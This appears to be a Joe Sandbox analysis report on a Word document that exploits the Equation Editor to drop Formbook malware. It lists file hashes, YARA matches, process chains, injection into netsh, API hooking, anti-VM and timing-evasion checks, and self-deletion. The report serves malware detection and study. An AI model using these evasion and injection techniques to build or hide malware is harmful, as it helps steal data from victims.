Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\princedan85671.exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\princedan85671.exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98

Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: String function: 00A6F970 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: String function: 00A43F92 appears 132 times
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: String function: 00A4373B appears 245 times
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: String function: 009FE2A8 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: String function: 009FDF5C appears 119 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00D0F970 appears 84 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00C9E2A8 appears 38 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00CE373B appears 245 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00CE3F92 appears 132 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00C9DF5C appears 121 times

Source: princedanx[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedanx[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedan85671.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedan85671.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedan85671.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedan85671.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: princedanx[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: princedan85671.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: princedan85671.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@9/10@4/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$OTATION1100630004R2.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC744.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\princedan85671.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\princedan85671.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: QUOTATION1100630004R2.doc	Virustotal: Detection: 33%
Source: QUOTATION1100630004R2.doc	ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\princedan85671.exe C:\Users\user\AppData\Roaming\princedan85671.exe
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan85671.exe C:\Users\user\AppData\Local\Temp\princedan85671.exe vgyjnbhui
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\princedan85671.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\princedan85671.exe C:\Users\user\AppData\Roaming\princedan85671.exe
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan85671.exe C:\Users\user\AppData\Local\Temp\princedan85671.exe vgyjnbhui
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\princedan85671.exe'

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\princedan85671.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: netsh.pdb source: princedan85671.exe, 00000006.00000002.2223629114.0000000000614000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: princedan85671.exe, netsh.exe

Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Code function: 4_2_001D48B5 push eax; retf
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Code function: 4_2_001D29DF push eax; retf
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Code function: 4_2_005B1E8E push 8B034575h; retf
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Code function: 4_2_005B1787 push esi; ret
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Code function: 4_2_00692030 push ss; iretd
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_004168E0 push eax; iretd
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00416907 push ds; retf
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_004093D6 push es; retf
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00416CB4 pushfd ; retf
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_004176ED push ebx; iretd
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_0041CEB5 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_0041CF6C push eax; ret
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_0041CF02 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_0041CF0B push eax; ret
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_009FDFA1 push ecx; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C9DFA1 push ecx; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_000893D6 push es; retf
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_000976ED push ebx; iretd
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_000968E0 push eax; iretd
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00096907 push ds; retf
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00096CB4 pushfd ; retf
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_0009CEB5 push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_0009CF0B push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_0009CF02 push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_0009CF6C push eax; ret

Source: C:\Users\user\AppData\Roaming\princedan85671.exe	File created: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\princedan85671.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE5

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: princedan85671.exe, 00000004.00000002.2181838241.0000000002451000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe

Code function: 6_2_00409A90 rdtsc

Source: C:\Users\user\AppData\Roaming\princedan85671.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\princedan85671.exe

Window / User API: threadDelayed 1631

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2572	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Roaming\princedan85671.exe TID: 2492	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 2524	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\princedan85671.exe

Thread delayed: delay time: 922337203685477

Source: princedan85671.exe	Binary or memory string: 3V97MjDwzNY10/CE3FdlPTc3QDRJmTHAfugGZ6zy6kRSVp+JZqpfk8Ffo9rd0+zrd2KPwKN3IwbD9bQLswwzDhyn4PdAUcVsBK5n\77208IwpEVv/3DMWkIIYr+GO0CgNtkcu/AzuJ1M8gweiCBUod5UYqcxkP0QAKl0hwizDJ5b4pZws5eikxSjRN4UuQgGFVmciINBjSJ\7NLLQdzKojxbpxogKKZWM8B1Zm8STIrPk9ANQxogWqeZZSr2a6ZmW+yC
Source: princedan85671.exe, 00000004.00000002.2181838241.0000000002451000.00000004.00000001.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: explorer.exe, 00000007.00000000.2211182513.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.2194776377.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: princedan85671.exe, 00000004.00000002.2181838241.0000000002451000.00000004.00000001.sdmp	Binary or memory string: vmware
